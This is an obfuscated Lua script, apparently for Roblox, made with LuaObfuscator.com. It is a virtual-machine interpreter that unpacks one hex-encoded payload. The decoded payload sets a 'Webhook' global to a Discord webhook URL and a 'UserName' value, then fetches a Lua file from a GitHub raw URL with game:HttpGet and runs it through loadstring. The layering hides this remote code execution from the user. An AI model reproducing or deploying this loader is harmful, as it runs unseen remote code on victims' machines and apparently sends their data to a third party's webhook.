--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==4) then v16=function(v25,v26,...)local v27=1;local v28;v25=v5(v4(v25,5),"..",function(v29)if (v2(v29,2)==79) then local v83=0;while true do if (0==v83) then v28=v1(v4(v29,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v3(v1(v29,16));if v28 then local v108=v6(v85,v28);v28=nil;return v108;else return v85;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v86=0 + 0 + 0 ;local v87;while true do if (v86==(662 -(34 + 628))) then v87=(v31/((4 -2)^(v32-(862 -(712 + 149)))))%((122 -(117 + 2 + 1))^(((v33-((593 -(27 + 94)) -(358 + 113))) -(v32-((2 -1) + 0))) + 1)) ;return v87-(v87%(288 -(184 + 103))) ;end end else local v88=2^(v32-(248 -(206 + 41))) ;return (((v31%(v88 + v88))>=v88) and 1) or 0 ;end end local function v34()local v47=1509 -((110 -(23 + 7)) + 705 + 724) ;local v48;while true do if (v47==(630 -((1544 -(882 + 600)) + 567))) then return v48;end if (v47==0) then v48=v2(v25,v27,v27);v27=v27 + (1874 -(231 + 1642)) ;v47=2 -1 ;end end end local function v35()local v49=1125 -(658 + 467) ;local v50;local v51;while true do if (v49==(0 -(1470 -(1248 + 222)))) then v50,v51=v2(v25,v27,v27 + 1 + 1 );v27=v27 + (674 -(550 + 45 + 77)) ;v49=1 + 0 ;end if (v49==(1 + 0)) then return (v51 * (439 -183)) + v50 ;end end end local function v36()local v52,v53,v54,v55=v2(v25,v27,v27 + (4 -1) );v27=v27 + 4 ;return (v55 * 16777216) + (v54 * (47226 + 18310)) + (v53 * (181 + 75)) + v52 ;end local function v37()local v56=v36();local v57=v36();local v58=1056 -(561 + 494) ;local v59=(v30(v57,679 -(296 + 382) ,11 + 9 ) * ((2 + 0 + (722 -(661 + 61)))^(25 + 7))) + v56 ;local v60=v30(v57,(823 -(579 + 235)) + 12 ,424 -(34 + 359) );local v61=((v30(v57,32)==(3 -2)) and  -(1 + 0 + 0)) or 1 ;if (v60==(0 + 0)) then if (v59==(0 + 0)) then return v61 * (0 + 0) ;else v60=1 + 0 ;v58=(0 -0) + 0 ;end elseif (v60==(998 + (1830 -(545 + 236)))) then return ((v59==(1427 -(1056 + 371))) and (v61 * (((1521 -(1088 + 432)) + 0)/((0 -0) + 0)))) or (v61 * NaN) ;end return v9(v61,v60-(368 + 655) ) * (v58 + (v59/((350 -(97 + 251))^(47 + 5)))) ;end local function v38(v39)local v62;if  not v39 then v39=v36();if (v39==(0 -0)) then return "";end end v62=v4(v25,v27,(v27 + v39) -(1855 -(1761 + 93)) );v27=v27 + v39 ;local v63={};for v76=1, #v62 do v63[v76]=v3(v2(v4(v62,v76,v76)));end return v7(v63);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v64=0 + 0 ;local v65;local v66;local v67;local v68;local v69;local v70;local v71;local v72;while true do if (v64==0) then v65=0 + 0 ;v66=nil;v64=1;end if (v64~=(8 -4)) then else while true do if (v65~=(107 -(61 + 44))) then else local v107=63 -(38 + 25) ;while true do if ((0 -0)==v107) then v70=nil;v71=nil;v107=3 -2 ;end if (v107~=(1 + 0)) then else v65=3;break;end end end if (v65==1) then v68=nil;v69=nil;v65=1159 -(879 + 278) ;end if (v65~=3) then else v72=nil;while true do local v109=1370 -(113 + 1257) ;while true do if (v109~=(1 + 0)) then else if ((0 -0)~=v66) then else local v111=0;while true do if (v111==2) then v66=1;break;end if ((0 + 0)~=v111) then else v67={};v68={};v111=1164 -(1075 + 88) ;end if (v111==(2 -1)) then v69={};v70={v67,v68,nil,v69};v111=8 -6 ;end end end break;end if ((880 -(850 + 30))==v109) then if (2~=v66) then else for v116=357 -(219 + 137) ,v36() do local v117=0 + 0 ;local v118;local v119;while true do if (v117~=(0 + 0)) then else local v137=0;while true do if (v137~=(51 -(27 + 23))) then else v117=1;break;end if (v137~=(0 + 0)) then else v118=0;v119=nil;v137=2 -1 ;end end end if (1==v117) then while true do if (v118==(1342 -(216 + 1126))) then v119=v34();if (v30(v119,1,1)==0) then local v154=0;local v155;local v156;local v157;local v158;while true do if (v154~=(0 -0)) then else v155=1054 -(219 + 835) ;v156=nil;v154=255 -(121 + 133) ;end if (v154==(14 -(9 + 3))) then while true do if (v155~=3) then else if (v30(v157,14 -11 ,3 + 0 )==1) then v158[4]=v72[v158[7 -3 ]];end v67[v116]=v158;break;end if (v155==(3 -2)) then local v174=0;while true do if (v174==(3 -2)) then v155=4 -2 ;break;end if (v174==0) then v158={v35(),v35(),nil,nil};if (v156==0) then local v190=0 -0 ;while true do if (v190==(299 -(85 + 214))) then v158[3]=v35();v158[4]=v35();break;end end elseif (v156==1) then v158[5 -2 ]=v36();elseif (v156==(3 -1)) then v158[87 -(77 + 7) ]=v36() -(2^(5 + 11)) ;elseif (v156~=3) then else local v196=0;local v197;local v198;while true do if (v196~=(1542 -(849 + 692))) then else while true do if (v197==(0 + 0)) then v198=0;while true do if (v198==0) then v158[3]=v36() -(2^(69 -53)) ;v158[1301 -(1146 + 151) ]=v35();break;end end break;end end break;end if (v196==0) then v197=638 -(473 + 165) ;v198=nil;v196=1;end end end v174=1119 -(836 + 282) ;end end end if (v155==0) then local v175=0 + 0 ;while true do if (v175~=(1985 -(22 + 1962))) then else v155=1;break;end if (v175~=(0 -0)) then else v156=v30(v119,1 + 1 ,3);v157=v30(v119,4,28 -22 );v175=1;end end end if (v155~=(4 -2)) then else if (v30(v157,2 -1 ,1)==1) then v158[2]=v72[v158[13 -(6 + 5) ]];end if (v30(v157,1 + 1 ,6 -4 )~=(1 -0)) then else v158[405 -(321 + 81) ]=v72[v158[3]];end v155=3 + 0 ;end end break;end if (1~=v154) then else v157=nil;v158=nil;v154=4 -2 ;end end end break;end end break;end end end for v120=1 -0 ,v36() do v68[v120-1 ]=v42();end for v122=1,v36() do v69[v122]=v36();end return v70;end if ((1809 -(1434 + 374))~=v66) then else local v112=0 + 0 ;local v113;while true do if ((1198 -(465 + 733))==v112) then v113=0;while true do if (v113==2) then v66=1 + 1 ;break;end if (v113==(1 -0)) then for v146=1,v71 do local v147=0;local v148;local v149;local v150;local v151;local v152;while true do if (v147~=0) then else v148=0;v149=nil;v147=152 -(77 + 74) ;end if (v147~=2) then else v152=nil;while true do if (v148~=1) then else local v171=1212 -(878 + 334) ;while true do if (v171~=(1093 -(266 + 826))) then else v148=7 -5 ;break;end if (v171~=0) then else v151=nil;v152=nil;v171=1;end end end if (v148~=(0 + 0)) then else local v172=16 -(10 + 6) ;while true do if (v172~=1) then else v148=1;break;end if (v172==0) then v149=0 + 0 ;v150=nil;v172=317 -(134 + 182) ;end end end if (v148==(4 -2)) then while true do if (v149==(3 -2)) then v152=nil;while true do if (v150~=1) then else if (v151==(1453 -(659 + 793))) then v152=v34()~=(0 + 0) ;elseif (v151==2) then v152=v37();elseif (v151~=3) then else v152=v38();end v72[v146]=v152;break;end if (v150==0) then local v187=0;local v188;local v189;while true do if (v187~=(1338 -(696 + 642))) then else v188=0;v189=nil;v187=2 -1 ;end if (v187~=1) then else while true do if (v188==0) then v189=1873 -(1525 + 348) ;while true do if (v189==(2 -1)) then v150=1389 -(1312 + 76) ;break;end if (v189~=(0 -0)) then else local v199=0;while true do if (1==v199) then v189=1 -0 ;break;end if ((461 -(257 + 204))~=v199) then else v151=v34();v152=nil;v199=1;end end end end break;end end break;end end end end break;end if (v149==0) then local v176=0;local v177;while true do if (v176~=(0 + 0)) then else v177=0 + 0 ;while true do if (v177==0) then local v192=1589 -(895 + 694) ;while true do if ((1978 -(1322 + 656))~=v192) then else v150=0;v151=nil;v192=969 -(844 + 124) ;end if (v192~=(3 -2)) then else v177=2 -1 ;break;end end end if (v177==1) then v149=4 -3 ;break;end end break;end end end end break;end end break;end if (v147==1) then v150=nil;v151=nil;v147=2;end end end v70[1859 -(1749 + 107) ]=v34();v113=2;end if (v113~=0) then else v71=v36();v72={};v113=1;end end break;end end end v109=1846 -(655 + 1190) ;end end end break;end if (v65==0) then v66=0 -0 ;v67=nil;v65=1264 -(350 + 913) ;end end break;end if (v64~=(6 -3)) then else v71=nil;v72=nil;v64=8 -4 ;end if (v64==1) then v67=nil;v68=nil;v64=2 -0 ;end if (v64==(2 + 0)) then v69=nil;v70=nil;v64=3;end end end local function v43(v44,v45,v46)local v73=v44[1];local v74=v44[2];local v75=v44[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v13("#",...) -1 ;local function v82()local v89=v73;local v90=v74;local v91=v75;local v92=v41;local v93={};local v94={};local v95={};for v99=0,v81 do if (((717 + 2186)<(4225 + 685)) and (v99>=v91)) then v93[v99-v91 ]=v80[v99 + 1 + 0 + 0 ];else v95[v99]=v80[v99 + (2 -1) ];end end local v96=(v81-v91) + (43 -(25 + 17)) ;local v97;local v98;while true do local v100=616 -(478 + 138) ;local v101;while true do if (((5616 -(95 + 688 + 751))>=1929) and ((25 -(19 + 6))==v100)) then v101=0;while true do if ((v101==1) or (646>(2146 + 1568))) then if ((4192>=(3505 -(1360 + 582))) and (v98<=((63 + 637) -(150 + 546)))) then if (((494 -(289 + 94))==(1997 -(18 + 1868))) and (v98<=(2 -1))) then if (((546 + (5612 -3519))<=3085) and (v98>((0 -0) -0))) then local v124=0 -(0 -0) ;local v125;local v126;while true do if ((v124==(1 + 0)) or ((130 + 709)>=4674)) then while true do if ((v125==(0 + 0 + 0 + 0)) or ((1524 -(175 + 304))>(5849 -(602 + 1197)))) then v126=v97[3 -1 ];v95[v126]=v95[v126](v14(v95,v126 + (3 -2) + 0 ,v79));break;end end break;end if (((1715 -(1273 + 442))==v124) or (4669<(10899 -(13757 -6102)))) then v125=0;v126=nil;v124=1 -0 ;end end else v95[v97[5 -3 ]]=v97[3];end elseif ((((371 + 1883) -706)==(1894 -(69 + 277))) and (v98<=2)) then v95[v97[5 -(3 + 0) ]]=v46[v97[3]];elseif ((v98==((1146 -(256 + 888)) + (1 -0))) or ((467 + 155)>=(890 + 925))) then local v138=0 + 0 ;local v139;local v140;local v141;while true do if ((v138==(1 + 0)) or (2371>=4626)) then v141=nil;while true do if (((1402 + 3443)>((262 + 682) -(382 + 95))) and (v139==(1 + 0))) then v95[v140 + 1 + 0 ]=v141;v95[v140]=v141[v97[3 + 1 ]];break;end if ((v139==(0 -0)) or ((4469 -(859 + 785))>=((1861 -(776 + 480)) + 2604))) then v140=v97[2 + (0 -0) ];v141=v95[v97[493 -(318 + (807 -(568 + 67))) ]];v139=540 -(411 + 128) ;end end break;end if ((v138==(0 -0)) or (3259<(1869 -(236 + 725)))) then v139=(2652 -(660 + 793)) -(529 + 670) ;v140=nil;v138=1 -0 ;end end else v46[v97[1 + 2 ]]=v95[v97[2]];end elseif ((864==(500 + 364)) and (v98<=6)) then if ((2048>(5957 -3942)) and (v98==(5 + 0))) then v95[v97[(3 -2) + 1 ]]();else local v131=0 + 0 ;local v132;local v133;local v134;local v135;local v136;while true do if ((v131==(2 + 0)) or ((736 + 3910)<(1605 -798))) then v136=nil;while true do if (((862 -341)<682) and ((0 -0)==v132)) then local v161=911 -(338 + 573) ;while true do if ((((3267 -(554 + 176)) -(24 + 848))>=(247 + 714)) and (v161==(3 -2))) then v132=1;break;end if (((0 -0)==v161) or ((2067 -(595 + 436))>(3033 -(1251 + 576)))) then v133=v97[1997 -(1594 + 401) ];v134,v135=v92(v95[v133](v14(v95,v133 + (1 -0) ,v97[11 -(1101 -(5 + 1088)) ])));v161=1;end end end if (((1201 -(78 + 1122))==v132) or ((3086 -(241 + 321))==(1478 -578))) then v79=(v135 + v133) -1 ;v136=0;v132=6 -4 ;end if (((3194 -(171 + 366))>(678 + (1520 -477))) and (v132==((1318 -(116 + 1200)) + 0))) then for v162=v133,v79 do local v163=0;local v164;while true do if (((0 + 0)==v163) or ((9974 -5503)==(13738 -10701))) then v164=0 -0 ;while true do if ((v164==(0 + 0)) or ((617 + 1331)<=(332 + 125 + 272))) then v136=v136 + 1 ;v95[v162]=v134[v136];break;end end break;end end end break;end end break;end if (((806 -570)==(1488 -(1082 + 170))) and (v131==(0 -(661 -(242 + 419))))) then v132=0;v133=nil;v131=1424 -(406 + 1017) ;end if (((4191 -2498)==(2929 -(1049 + 187))) and (v131==(1 + 0))) then v134=nil;v135=nil;v131=8 -(23 -17) ;end end end elseif ((3393>=(2223 -(414 + (84 -62)))) and (v98<=(20 -13))) then do return;end elseif ((v98>(8 + 0)) or (((15432 -11530) -(121 + 238))>(8745 -4644))) then v78=v97[2 + 1 ];elseif ((((5439 -2218) + 164)<=(464 + 4124)) and (v95[v97[2 + 0 + 0 ]]==v97[1 + 2 + 1 ])) then v78=v78 + 1 ;else v78=v97[98 -(19 + (139 -63)) ];end v78=v78 + (1689 -(1040 + 648)) ;break;end if (((0 + 0)==v101) or ((5332 -3397)>((7146 -3687) -(739 + 518)))) then local v110=445 -(380 + 65) ;while true do if ((v110==(0 -0)) or ((730 + 813)==4945)) then v97=v89[v78];v98=v97[(47 + 783) -((382 -(59 + 49)) + 555) ];v110=1 + 0 ;end if (((1 + 0 + (0 -0))==v110) or (1326>=(1299 + 2142 + 634))) then v101=1 + 0 ;break;end end end end break;end end end end A,B=v41(v12(v82));if  not A[1] then local v102=v44[4][v78] or "?" ;error("Script error at ["   .. v102   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end return v43(v42(),{},v26)(...);end;v16("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C756103083O00557365724E616D6503063O0076496D66616F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313038393833323436373236303738343635302F705775746E71416946415A34374E47686352767A54442O624B654B5949696A3943785A71724A2D6A4C305A5F2D65584A6578514A623231704D6779724C7A6950564A695500143O00124O00013O0026083O000B000100020004093O000B0001001202000100033O001202000200043O00200300020002000500122O000400064O0006000200044O000100013O00022O00050001000100010004093O001300010026083O0001000100010004093O0001000100122O000100083O001204000100073O00122O0001000A3O001204000100093O00124O00023O0004093O000100012O00073O00017O00143O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end end end
